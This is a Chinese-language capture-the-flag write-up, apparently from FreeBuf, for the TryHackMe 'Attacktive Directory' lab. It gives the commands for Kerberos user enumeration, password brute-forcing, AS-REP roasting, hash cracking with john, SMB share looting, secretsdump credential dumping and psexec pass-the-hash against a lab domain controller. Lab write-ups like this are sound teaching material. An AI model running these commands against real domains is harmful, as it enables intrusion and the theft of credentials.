Skip to content

Latest commit

 

History

History
386 lines (222 loc) · 9.96 KB

[]-2021-10-31-Attack tive Directory - FreeBuf网络安全行业门户.md

File metadata and controls

386 lines (222 loc) · 9.96 KB
Raw

freeBuf

主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课

报告

专辑

  • ··· __

  • 招聘站

  • ··· __

  • 公开课

  • ··· __

  • 用户服务 __

  • ··· __

  • 企业服务 __

  • ··· __

行业专区

政 府

CNCERT CNNVD

云沙箱

__

登录 注册 创作中心

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序把安全装进口袋

Attack tive Directory

__

__

__

__

__

__

__

Attack tive Directory

__ __2021-07-12 19:19:27 __

攻击活动目录

靶机:https://tryhackme.com/room/attacktivedirectory

本文围绕靶机来进行讨论。 --- sec875

nmap

nmap -p- -T4 -v 10.10.216.166
注意:如果想查看流量的情况,可以参考本人写的流量篇,也许可以帮助到您https://www.anquanke.com/post/id/243935

安装Impcket

git clone https://github.com/SecureAuthCorp/impacket.git /opt/impacket 

sudo apt install python3-pip 

pip3 install -r /opt/impacket/requirements.txt 

cd /opt/impacket/ && python3 ./setup.py install

如果有问题运行下面命令

sudo git clone https://github.com/SecureAuthCorp/impacket.git /opt/impacket 

sudo pip3 install -r /opt/impacket/requirements.txt 

cd /opt/impacket/ 

sudo pip3 install . 

sudo python3 setup.py install

安装bloodhound 和 neo4j

apt install bloodhound neo4j

smb连接与枚举

enum4linux -a 10.10.216.166
smbclient -L \\\\10.10.216.166\\
image

枚举139,445

nmap -p 139,445 -A -T4 -v 10.10.216.166
实际环境谨慎账户枚举,别把用户账号锁定

枚举Kerberos用户

工具安装,请查如下URL:
https://pypi.org/project/kerbrute/

python3 kerbrute.py

使用字典在该github仓库获取
https://raw.githubusercontent.com/Sq00ky/attacktive-directory- tools/master/userlist.txt

https://raw.githubusercontent.com/Sq00ky/attacktive-directory- tools/master/passwordlist.txt

编辑一下 /etc/hosts 方便参数填写
image

python3 kerbrute.py -dc-ip 10.10.216.166 -users /home/sec875/userlist.txt -domain spookysec.local
可以看见枚举出来的用户
image

然后就是用工具枚举账户密码
python3 kerbrute.py -dc-ip 10.10.216.166 -users /home/sec875/userlist.txt -passwords /home/sec875/passwordlist.txt -domain spookysec.local

kerberos服务票据预认证

快速理解的图
image

攻击 Kerberos服务票据的预认证缺陷的点

image

参考资料:https://book.hacktricks.xyz/windows/active-directory- methodology/asreproast

简而言之。任何人都可以使用svc- admin【任意用户】用户向DC发送AS_REQ请求,接收AS_REP响应。响应包中携带该用户密码的哈希。最后本地破解或者哈希传递

优势在于执行预认证攻击不需要域账户(在前面,我们使用了检索域中没有 Kerberos 预身份验证用户的工具。 否则必须猜测用户名。 )

如果您对简图有点意见,并认为我错过了很多东西,建议参考kerberos的RFC文档(如果感觉很困难,可以联系本人,帮忙翻译):https://www.rfc- editor.org/rfc/rfc1510.html

可以从消息交换这里读起:
image

发送请求拉取哈希

python3 GetNPUsers.py spookysec.local/svc-admin -no-pass
此工具位于前面安装的Impcket包中
image
编程不是必须的,此代码有400多行,但我鼓励您针对性的阅读它,从里面的语法糖结构开始搜python官方文档。为了控制篇幅,代码解读则不在本文讨论范围之内。

拉取结果如下图所示
image

存到hash.txt文件里
image

本地破解哈希

john hash.txt --wordlist=passwordlist.txt
image

看看共享文件夹
image

关于IPC$ (默认共享,空会话等术语)请查阅微软文档,不要和共享文件夹混淆了,它们是不同的对象:
https://docs.microsoft.com/zh-cn/troubleshoot/windows-server/networking/inter- process-communication-share-null-session
image

进入感兴趣的文件夹中,get拉取信息到家目录
smbclient \\\\10.10.216.166\\backup -U svc-admin
image

查看内容,base64解码
image

哈希转存
secretsdump.py 脚本在何处?嘿。相信到这里已经难不住大家了。

image

注意-just-dc参数转存了什么东西。
image

哈希传递

python3 psexec.py --help
找到哈希传递的参数
image

注意,它做了一系列的权限维持

image

其他域控资料

https://blog.spookysec.net/kerberos-abuse/

结尾

如果您喜欢web安全,还可以查阅本人编辑的web安全101

要不要考虑请叔喝上一杯?
https://www.yuque.com/sec875/blzpv4/ofepol

祝各位师傅都有所获。

我们还会再见面的。

共勉。

本文作者:, 转载请注明来自FreeBuf.COM

__ # 渗透测试

被以下专辑收录,发现更多精彩内容

+ 收入我的专辑

展开更多 __

评论 __按热度排序

请登录/注册后在FreeBuf发布内容哦

相关推荐

\

关 注

  • 0 文章数
  • 0 评论数
  • 0 关注者

文章目录

攻击活动目录

nmap

安装Impcket

安装bloodhound 和 neo4j

smb连接与枚举

枚举139,445

枚举Kerberos用户

kerberos服务票据预认证

攻击 Kerberos服务票据的预认证缺陷的点

发送请求拉取哈希

本地破解哈希

哈希传递

其他域控资料

结尾

登录 / 注册后在FreeBuf发布内容哦

__ 收入专辑

__

分享文章

分享到微信

分享到微博

分享到QQ

复制链接

收藏文章

匿名 发 表 取 消 有人回复时邮件通知我

本站由阿里云 提供计算与安全服务

FreeBuf社群入口

用户服务

企业服务

合作信息

关于我们

战略伙伴

FreeBuf+小程序

扫码把安全装进口袋

Copyright © 2020 WWW.FREEBUF.COM All Rights Reserved 沪ICP备13033796号 | 沪公安网备